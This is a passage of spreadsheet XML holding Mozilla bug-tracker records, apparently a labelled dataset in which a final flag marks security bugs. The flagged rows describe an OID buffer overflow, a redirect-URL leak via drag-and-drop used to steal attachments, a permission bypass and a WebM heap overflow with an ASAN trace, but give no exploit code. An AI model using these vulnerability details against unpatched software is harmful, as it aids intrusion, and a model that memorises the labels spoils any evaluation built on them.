          <t>(Under Win 98, Dell PII-350, 64MB Ram ATI Rage Pro Graphics)
When I scroll an iframe within a web page I get really choppy scrolling, this is
a new problem since they scroll fine in Mozilla 1.1 and IE. The first build to
exhibit this problem is : 
Mozilla 1.2b
Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.2b) Gecko/20020920
Nightly Build Folder: 2002-09-20-04
Can't work out which check-in would be most likely to have caused this problem
and haven't seen many other people complain about this yet..
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=SeaMonkeyAll&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=09%2F18%2F2002&amp;maxdate=09%2F20%2F2002+09%3A30&amp;cvsroot=%2Fcvsroot</t>
        </is>
      </c>
      <c r="X5077" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5078">
      <c r="A5078" t="n">
        <v>1488946</v>
      </c>
      <c r="B5078" t="inlineStr">
        <is>
          <t>2018-09-05 15:57:18 -0700</t>
        </is>
      </c>
      <c r="C5078" t="inlineStr">
        <is>
          <t>browser_aboutSearchReset.js is going to permafail when the Gecko version number is bumped to 65 on 2018-10-22</t>
        </is>
      </c>
      <c r="D5078" t="inlineStr">
        <is>
          <t>2019-01-22 02:31:37 -0800</t>
        </is>
      </c>
      <c r="E5078" t="n">
        <v>1</v>
      </c>
      <c r="F5078" t="n">
        <v>1</v>
      </c>
      <c r="G5078" t="n">
        <v>2</v>
      </c>
      <c r="H5078" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5078" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5078" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K5078" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5078" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5078" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5078" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5078" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5078" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q5078" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5078" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5078" t="inlineStr">
        <is>
          <t>Firefox 66</t>
        </is>
      </c>
      <c r="T5078" t="n">
        <v>1</v>
      </c>
      <c r="U5078" t="n">
        <v>0</v>
      </c>
      <c r="V5078" t="n">
        <v>18</v>
      </c>
      <c r="W5078" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]:
Central as Beta simulation
Treeherder link: https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=701dd8f52ed8236eb93a1bf297ef81997a391170&amp;selectedJob=197614363
Failure log: https://treeherder.mozilla.org/logviewer.html#?job_id=197614363&amp;repo=try&amp;lineNumber=4498
[task 2018-09-05T14:19:29.624Z] 14:19:29     INFO - TEST-START | browser/components/search/test/browser_aboutSearchReset.js
[task 2018-09-05T14:19:29.645Z] 14:19:29     INFO - TEST-INFO | started process screentopng
[task 2018-09-05T14:19:30.485Z] 14:19:30     INFO - TEST-INFO | screentopng: exit 0
[task 2018-09-05T14:19:30.490Z] 14:19:30     INFO - TEST-UNEXPECTED-FAIL | browser/components/search/test/browser_aboutSearchReset.js | histogram has expected content - [149,23,173] deepEqual [0,0,0,0,0,0] - JS frame :: chrome://mochitests/content/browser/browser/components/search/test/browser_aboutSearchReset.js :: checkTelemetryRecords :: line 28
[task 2018-09-05T14:19:30.491Z] 14:19:30     INFO - Stack trace:
[task 2018-09-05T14:19:30.491Z] 14:19:30     INFO - chrome://mochitests/content/browser/browser/components/search/test/browser_aboutSearchReset.js:checkTelemetryRecords:28
[task 2018-09-05T14:19:30.493Z] 14:19:30     INFO - chrome://mochitests/content/browser/browser/components/search/test/browser_aboutSearchReset.js:test/&lt;:143
[task 2018-09-05T14:19:30.494Z] 14:19:30     INFO - chrome://mochitests/content/browser/browser/components/search/test/browser_aboutSearchReset.js:test:140
[task 2018-09-05T14:19:30.495Z] 14:19:30     INFO - chrome://mochikit/content/browser-test.js:Tester_execTest:1133
[task 2018-09-05T14:19:30.497Z] 14:19:30     INFO - chrome://mochikit/content/browser-test.js:nextTest/&lt;:995
[task 2018-09-05T14:19:30.499Z] 14:19:30     INFO - chrome://mochikit/content/tests/SimpleTest/SimpleTest.js:SimpleTest.waitForFocus/waitForFocusInner/focusedOrLoaded/&lt;:795
[task 2018-09-05T14:19:30.500Z] 14:19:30     INFO - Test the 'Keep Current Settings' button.
[task 2018-09-05T14:19:30.501Z] 14:19:30     INFO - GECKO(2372) | ++DOCSHELL 0xe9a0c400 == 3 [pid = 2494] [id = {af04ca3f-2c2f-452a-8b98-fb832ac7fbfb}]
[task 2018-09-05T14:19:30.502Z] 14:19:30     INFO - GECKO(2372) | ++DOMWINDOW == 6 (0xe9804940) [pid = 2494] [serial = 6] [outer = (nil)]
[task 2018-09-05T14:19:30.502Z] 14:19:30     INFO - Wait tab event: load
[task 2018-09-05T14:19:30.504Z] 14:19:30     INFO - GECKO(2372) | ++DOMWINDOW == 7 (0xe9a0d800) [pid = 2494] [serial = 7] [outer = 0xe9804940]
[task 2018-09-05T14:19:30.505Z] 14:19:30     INFO - GECKO(2372) | ++DOMWINDOW == 8 (0xe9a0e400) [pid = 2494] [serial = 8] [outer = 0xe9804940]
[task 2018-09-05T14:19:30.506Z] 14:19:30     INFO - GECKO(2372) | --DOCSHELL 0xea43b800 == 0 [pid = 2555] [id = {e583a7b0-ea3d-4294-ba42-0b8446aacc14}]
[task 2018-09-05T14:19:30.508Z] 14:19:30     INFO - GECKO(2372) | ++DOCSHELL 0xe05d3800 == 7 [pid = 2372] [id = {ee9e2d26-531f-4e03-9824-3911739a56bb}]
[task 2018-09-05T14:19:30.509Z] 14:19:30     INFO - GECKO(2372) | ++DOMWINDOW == 19 (0xdf833ee0) [pid = 2372] [serial = 19] [outer = (nil)]
[task 2018-09-05T14:19:30.511Z] 14:19:30     INFO - GECKO(2372) | --DOMWINDOW == 7 (0xea436400) [pid = 2494] [serial = 2] [outer = (nil)] [url = about:blank]
[task 2018-09-05T14:19:30.536Z] 14:19:30     INFO - GECKO(2372) | ++DOMWINDOW == 20 (0xe07f2000) [pid = 2372] [serial = 20] [outer = 0xdf833ee0]
[task 2018-09-05T14:19:30.641Z] 14:19:30     INFO - GECKO(2372) | [Parent 2372, Main Thread] WARNING: NS_FAILED internal_GetScalarByEnum for CHILD: file /builds/worker/workspace/build/src/toolkit/components/telemetry/core/TelemetryScalar.cpp, line 2088
[task 2018-09-05T14:19:30.643Z] 14:19:30     INFO - GECKO(2372) | [Parent 2372, Main Thread] WARNING: NS_FAILED internal_GetScalarByEnum for CHILD: file /builds/worker/workspace/build/src/toolkit/components/telemetry/core/TelemetryScalar.cpp, line 2088
[task 2018-09-05T14:19:30.645Z] 14:19:30     INFO - GECKO(2372) | [Parent 2372, Main Thread] WARNING: NS_FAILED internal_GetScalarByEnum for CHILD: file /builds/worker/workspace/build/src/toolkit/components/telemetry/core/TelemetryScalar.cpp, line 2088
[task 2018-09-05T14:19:30.648Z] 14:19:30     INFO - GECKO(2372) | [Parent 2372, Main Thread] WARNING: NS_FAILED internal_GetScalarByEnum for CHILD: file /builds/worker/workspace/build/src/toolkit/components/telemetry/core/TelemetryScalar.cpp, line 2088
[task 2018-09-05T14:19:30.679Z] 14:19:30     INFO - GECKO(2372) | ++DOMWINDOW == 21 (0xe05d8400) [pid = 2372] [serial = 21] [outer = 0xdf833ee0]
[task 2018-09-05T14:19:30.805Z] 14:19:30     INFO - GECKO(2372) | ++DOMWINDOW == 22 (0xe07f4400) [pid = 2372] [serial = 22] [outer = 0xdf833ee0]
[task 2018-09-05T14:19:31.075Z] 14:19:31     INFO - GECKO(2372) | [Parent 2372, Main Thread] WARNING: NS_ENSURE_SUCCESS(rv, rv) failed with result 0x80004005: file /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp, line 4015
[task 2018-09-05T14:19:31.206Z] 14:19:31     INFO - Tab event received: load
[task 2018-09-05T14:19:31.207Z] 14:19:31     INFO - Running test
[task 2018-09-05T14:19:31.209Z] 14:19:31     INFO - Waiting for engine to be added: testEngine.xml
[task 2018-09-05T14:19:31.247Z] 14:19:31     INFO - Search engine added: testEngine.xml
[task 2018-09-05T14:19:31.250Z] 14:19:31     INFO - GECKO(2372) | JavaScript error: resource://activity-stream/lib/TopSitesFeed.jsm, line 93: TypeError: setting getter-only property "_currentSearchHostname"
[task 2018-09-05T14:19:31.308Z] 14:19:31     INFO - TEST-PASS | browser/components/search/test/browser_aboutSearchReset.js | loaded expected url: http://mochi.test:8888/browser/browser/components/search/test/?searchtest=a+search - 
[task 2018-09-05T14:19:31.313Z] 14:19:31     INFO - TEST-PASS | browser/components/search/test/browser_aboutSearchReset.js | the custom engine is still default - 
[task 2018-09-05T14:19:31.315Z] 14:19:31     INFO - TEST-PASS | browser/components/search/test/browser_aboutSearchReset.js | the loadPathHash has been fixed - 
[task 2018-09-05T14:19:31.323Z] 14:19:31     INFO - Not taking screenshot here: see the one that was previously logged
[task 2018-09-05T14:19:31.324Z] 14:19:31     INFO - TEST-UNEXPECTED-FAIL | browser/components/search/test/browser_aboutSearchReset.js | histogram has expected content - [181,31,225] deepEqual [0,1,0,0,0,0] - JS frame :: chrome://mochitests/content/browser/browser/components/search/test/browser_aboutSearchReset.js :: checkTelemetryRecords :: line 28
SEARCH_RESET_RESULT is set to expire in firefox 65</t>
        </is>
      </c>
      <c r="X5078" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5079">
      <c r="A5079" t="n">
        <v>1368652</v>
      </c>
      <c r="B5079" t="inlineStr">
        <is>
          <t>2017-05-30 03:31:44 -0700</t>
        </is>
      </c>
      <c r="C5079" t="inlineStr">
        <is>
          <t>GetDefaultOIDFormat: buffer overflow caused by long OIDs</t>
        </is>
      </c>
      <c r="D5079" t="inlineStr">
        <is>
          <t>2018-02-01 16:46:02 -0800</t>
        </is>
      </c>
      <c r="E5079" t="n">
        <v>1</v>
      </c>
      <c r="F5079" t="n">
        <v>1</v>
      </c>
      <c r="G5079" t="n">
        <v>3</v>
      </c>
      <c r="H5079" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5079" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5079" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K5079" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L5079" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5079" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5079" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5079" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5079" t="inlineStr">
        <is>
          <t>[psm-assigned][adv-main55+][adv-esr52.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5079" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5079" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5079" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T5079" t="n">
        <v>1</v>
      </c>
      <c r="U5079" t="n">
        <v>0</v>
      </c>
      <c r="V5079" t="n">
        <v>27</v>
      </c>
      <c r="W5079" t="inlineStr">
        <is>
          <t>Created attachment 8872576
cp-bigoid.pem
User Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Build ID: 20170420084331
Steps to reproduce:
View a cert with a really long OID.
You can reproduce using attached file cp-bigoid.pem.  Go to certificate import dialog,
then "View Cert".
Actual results:
The GetDefaultOIDFormat printing function overflows the buffer, causing
segfault.
Expected results:
The OID should have been printed properly.
Or at the very least, Firefox should not have crashed :)</t>
        </is>
      </c>
      <c r="X5079" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5080">
      <c r="A5080" t="n">
        <v>1189814</v>
      </c>
      <c r="B5080" t="inlineStr">
        <is>
          <t>2015-07-31 09:43:07 -0700</t>
        </is>
      </c>
      <c r="C5080" t="inlineStr">
        <is>
          <t>Dragging and dropping image to &lt;textbox&gt; pastes final URL of image after redirects</t>
        </is>
      </c>
      <c r="D5080" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:49 -0700</t>
        </is>
      </c>
      <c r="E5080" t="n">
        <v>1</v>
      </c>
      <c r="F5080" t="n">
        <v>1</v>
      </c>
      <c r="G5080" t="n">
        <v>3</v>
      </c>
      <c r="H5080" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5080" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5080" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K5080" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5080" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5080" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5080" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5080" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5080" t="inlineStr">
        <is>
          <t>[adv-main41+][adv-esr38.3+] can be used in critical attacks against certain sites.</t>
        </is>
      </c>
      <c r="Q5080" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5080" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5080" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T5080" t="n">
        <v>1</v>
      </c>
      <c r="U5080" t="n">
        <v>0</v>
      </c>
      <c r="V5080" t="n">
        <v>30</v>
      </c>
      <c r="W5080" t="inlineStr">
        <is>
          <t>https://fetch.spec.whatwg.org/#atomic-http-redirect-handling says:
"Throughout the platform, redirects (a response whose status is one of 301, 302, 303, 307, and 308) are not exposed to APIs. Exposing redirects might leak information not otherwise available through a cross-site scripting attack."
However, if you have:
&lt;img src="http://foo.com/"&gt;
and that URL redirects to "http://bar.com?secret=12345", and then that loads the image, and then if you drag-drop the image to a textbox, the final URL is dropped (and therefore then available to script) rather than the initial URL.
This has been combined with cookie bombing to make a POC to steal Bugzilla secure attachments - see bug 1179241. I talked with Anne VK and he said that whatever we do about cookie bombing, this is also a bug.
Gerv</t>
        </is>
      </c>
      <c r="X5080" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5081">
      <c r="A5081" t="n">
        <v>544064</v>
      </c>
      <c r="B5081" t="inlineStr">
        <is>
          <t>2010-02-03 11:34:20 -0800</t>
        </is>
      </c>
      <c r="C5081" t="inlineStr">
        <is>
          <t>User editable plugin directories</t>
        </is>
      </c>
      <c r="D5081" t="inlineStr">
        <is>
          <t>2010-03-04 11:01:38 -0800</t>
        </is>
      </c>
      <c r="E5081" t="n">
        <v>1</v>
      </c>
      <c r="F5081" t="n">
        <v>1</v>
      </c>
      <c r="G5081" t="n">
        <v>6</v>
      </c>
      <c r="H5081" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5081" t="inlineStr">
        <is>
          <t>Skywriter Graveyard</t>
        </is>
      </c>
      <c r="J5081" t="inlineStr">
        <is>
          <t>Add-ons &amp; Plugins</t>
        </is>
      </c>
      <c r="K5081" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5081" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5081" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N5081" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5081" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5081" t="inlineStr"/>
      <c r="Q5081" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5081" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5081" t="inlineStr">
        <is>
          <t>0.7</t>
        </is>
      </c>
      <c r="T5081" t="n">
        <v>1</v>
      </c>
      <c r="U5081" t="n">
        <v>0</v>
      </c>
      <c r="V5081" t="n">
        <v>2</v>
      </c>
      <c r="W5081" t="inlineStr">
        <is>
          <t>users should be able to edit plugins from within Bespin by marking a directory 
as being a plugin.</t>
        </is>
      </c>
      <c r="X5081" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5082">
      <c r="A5082" t="n">
        <v>1138808</v>
      </c>
      <c r="B5082" t="inlineStr">
        <is>
          <t>2015-03-02 23:31:11 -0800</t>
        </is>
      </c>
      <c r="C5082" t="inlineStr">
        <is>
          <t>Permission bypass for Wifi direct system messages</t>
        </is>
      </c>
      <c r="D5082" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:32 -0700</t>
        </is>
      </c>
      <c r="E5082" t="n">
        <v>1</v>
      </c>
      <c r="F5082" t="n">
        <v>1</v>
      </c>
      <c r="G5082" t="n">
        <v>6</v>
      </c>
      <c r="H5082" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5082" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5082" t="inlineStr">
        <is>
          <t>Wifi</t>
        </is>
      </c>
      <c r="K5082" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5082" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5082" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5082" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5082" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5082" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q5082" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5082" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5082" t="inlineStr">
        <is>
          <t>2.2 S7 (6mar)</t>
        </is>
      </c>
      <c r="T5082" t="n">
        <v>1</v>
      </c>
      <c r="U5082" t="n">
        <v>0</v>
      </c>
      <c r="V5082" t="n">
        <v>12</v>
      </c>
      <c r="W5082" t="inlineStr">
        <is>
          <t>I'm not sure when WifiDirect was enabled but there appears to be no permission checks on the system messages:
https://dxr.mozilla.org/mozilla-central/source/dom/messages/SystemMessagePermissionsChecker.jsm#127
Unless I'm mistaken, that means any app could listen for these system messages, which is probably a privacy issue? It is documented as requiring the "wifi-manage" permission, but this is not how it is implemented. Marking as secure just in case, but its publicly documented so not sure how useful that is.
If this is actually an oversight, then this is probably a blocking bug, so marking 2.2?
The sec-rating is a guess, im not sure of the actually implication here, it may not actually be too bad.</t>
        </is>
      </c>
      <c r="X5082" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5083">
      <c r="A5083" t="n">
        <v>4936</v>
      </c>
      <c r="B5083" t="inlineStr">
        <is>
          <t>1999-04-10 13:21:13 -0700</t>
        </is>
      </c>
      <c r="C5083" t="inlineStr">
        <is>
          <t>Applet life cycle is wrong in OJI</t>
        </is>
      </c>
      <c r="D5083" t="inlineStr">
        <is>
          <t>2010-10-16 12:24:53 -0700</t>
        </is>
      </c>
      <c r="E5083" t="n">
        <v>1</v>
      </c>
      <c r="F5083" t="n">
        <v>1</v>
      </c>
      <c r="G5083" t="n">
        <v>6</v>
      </c>
      <c r="H5083" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5083" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5083" t="inlineStr">
        <is>
          <t>Java: OJI</t>
        </is>
      </c>
      <c r="K5083" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5083" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5083" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5083" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5083" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5083" t="inlineStr"/>
      <c r="Q5083" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5083" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5083" t="inlineStr">
        <is>
          <t>M6</t>
        </is>
      </c>
      <c r="T5083" t="n">
        <v>1</v>
      </c>
      <c r="U5083" t="n">
        <v>0</v>
      </c>
      <c r="V5083" t="n">
        <v>3</v>
      </c>
      <c r="W5083" t="inlineStr">
        <is>
          <t>When running applet in both viewer.exe and apprunner.exe, applet should be
initialized the first time it is loaded. Start() and Stop() should be called
between page switch, and destroy() should be called only if the browser decided
to prunce the applet.
However, in Gecko, all applets are init/start/stop/destroy for every page
switch, and this is not the correct applet lifecycle.</t>
        </is>
      </c>
      <c r="X5083" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5084">
      <c r="A5084" t="n">
        <v>1200148</v>
      </c>
      <c r="B5084" t="inlineStr">
        <is>
          <t>2015-08-31 02:19:13 -0700</t>
        </is>
      </c>
      <c r="C5084" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow due to overflow in nestegg_track_codec_data</t>
        </is>
      </c>
      <c r="D5084" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:05 -0700</t>
        </is>
      </c>
      <c r="E5084" t="n">
        <v>1</v>
      </c>
      <c r="F5084" t="n">
        <v>1</v>
      </c>
      <c r="G5084" t="n">
        <v>3</v>
      </c>
      <c r="H5084" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5084" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5084" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K5084" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5084" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5084" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5084" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5084" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5084" t="inlineStr">
        <is>
          <t>[adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q5084" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5084" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5084" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T5084" t="n">
        <v>1</v>
      </c>
      <c r="U5084" t="n">
        <v>0</v>
      </c>
      <c r="V5084" t="n">
        <v>26</v>
      </c>
      <c r="W5084" t="inlineStr">
        <is>
          <t>Created attachment 8654765
repro-file.webm
Tested on: 
OS: Ubuntu 14.04
Firefox: ASAN debug-build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan-debug/latest/
ASAN-trace:
=================================================================
==28309==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000d1b9b at pc 0x46fac7 bp 0x7f81856f75f0 sp 0x7f81856f6db0
READ of size 110 at 0x6070000d1b9b thread T26 (MediaPl~back #1)
    #0 0x46fac6 in memcpy /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:366
    #1 0x7f81acac2b87 in void AssignRangeAlgorithm&lt;true, true&gt;::implementation&lt;unsigned char, unsigned char, unsigned long, unsigned long&gt;(unsigned char*, unsigned long, unsigned long, unsigned char const*
) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/media/libstagefright/../../dist/include/nsTArray.h:559
    #2 0x7f81aca86265 in unsigned char* nsTArray_Impl&lt;unsigned char, nsTArrayInfallibleAllocator&gt;::AppendElements&lt;unsigned char, nsTArrayInfallibleAllocator&gt;(unsigned char const*, unsigned long) /builds/sl
ave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/media/libstagefright/../../dist/include/nsTArray.h:1510
    #3 0x7f81b07467d0 in mozilla::XiphHeadersToExtradata(mozilla::MediaByteBuffer*, nsTArray&lt;unsigned char const*&gt; const&amp;, nsTArray&lt;unsigned long&gt; const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build
/src/dom/media/XiphExtradata.cpp:26
    #4 0x7f81b098652b in mozilla::WebMDemuxer::ReadMetadata() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/media/webm/WebMDemuxer.cpp:412
    #5 0x7f81b09857c6 in mozilla::WebMDemuxer::Init() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/media/webm/WebMDemuxer.cpp:161
    #6 0x7f81b062c2e2 in mozilla::MediaFormatReader::AsyncReadMetadata() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/media/MediaFormatReader.cpp:293
    #7 0x7f81b06a8815 in nsRefPtr&lt;mozilla::MozPromise&lt;nsRefPtr&lt;mozilla::MetadataHolder&gt;, mozilla::ReadMetadataFailureReason, true&gt; &gt; mozilla::detail::MethodCallInvokeHelper&lt;nsRefPtr&lt;mozilla::MozPromise&lt;nsR
efPtr&lt;mozilla::MetadataHolder&gt;, mozilla::ReadMetadataFailureReason, true&gt; &gt;, mozilla::MediaDecoderReader&gt;(nsRefPtr&lt;mozilla::MozPromise&lt;nsRefPtr&lt;mozilla::MetadataHolder&gt;, mozilla::ReadMetadataFailureReason,
 true&gt; &gt; (mozilla::MediaDecoderReader::*)(), mozilla::MediaDecoderReader*, mozilla::Tuple&lt;&gt;&amp;, mozilla::IndexSequence&lt;&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/media/../../di
st/include/mozilla/MozPromise.h:869
    #8 0x7f81b06a86ce in mozilla::detail::MethodCall&lt;mozilla::MozPromise&lt;nsRefPtr&lt;mozilla::MetadataHolder&gt;, mozilla::ReadMetadataFailureReason, true&gt;, mozilla::MediaDecoderReader&gt;::Invoke() /builds/slave/m
-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/media/../../dist/include/mozilla/MozPromise.h:894
    #9 0x7f81b06a849c in mozilla::detail::ProxyRunnable&lt;mozilla::MozPromise&lt;nsRefPtr&lt;mozilla::MetadataHolder&gt;, mozilla::ReadMetadataFailureReason, true&gt;, mozilla::MediaDecoderReader&gt;::Run() /builds/slave/m
-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/media/../../dist/include/mozilla/MozPromise.h:912
    #10 0x7f81acc68727 in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/xpcom/threads/../../dist/include/mozilla/TaskDispatcher.h:
180
.
.
.
0x6070000d1b9b is located 0 bytes to the right of 75-byte region [0x6070000d1b50,0x6070000d1b9b)
allocated by thread T26 (MediaPl~back #1) here:
    #0 0x48290b in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:95
    #1 0x7f81accafb02 in mozilla::CountingAllocatorBase&lt;NesteggReporter&gt;::CountingRealloc(void*, unsigned long) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/xpcom/build/../../dist/include/mozilla/CountingAllocatorBase.h:79
    #2 0x7f81b2b11113 in halloc /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/media/libnestegg/src/halloc.c:78
    #3 0x7f81b2b197c4 in ne_pool_alloc /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/media/libnestegg/src/nestegg.c:534
    #4 0x7f81b2b1970d in ne_read_binary /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/media/libnestegg/src/nestegg.c:753
    #5 0x7f81b2b191da in ne_read_simple /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/media/libnestegg/src/nestegg.c:1017
    #6 0x7f81b2b128cf in ne_parse /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/media/libnestegg/src/nestegg.c:1088
    #7 0x7f81b2b11c23 in nestegg_init /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/media/libnestegg/src/nestegg.c:1948
    #8 0x7f81b0985bc0 in mozilla::WebMDemuxer::ReadMetadata() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/media/webm/WebMDemuxer.cpp:272
    #9 0x7f81b09857c6 in mozilla::WebMDemuxer::Init() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/media/webm/WebMDemuxer.cpp:161
    #10 0x7f81b062c2e2 in mozilla::MediaFormatReader::AsyncReadMetadata() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/media/MediaFormatReader.cpp:293
.
.
.</t>
        </is>
      </c>
      <c r="X5084" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5085">
      <c r="A5085" t="n">
        <v>45116</v>
      </c>
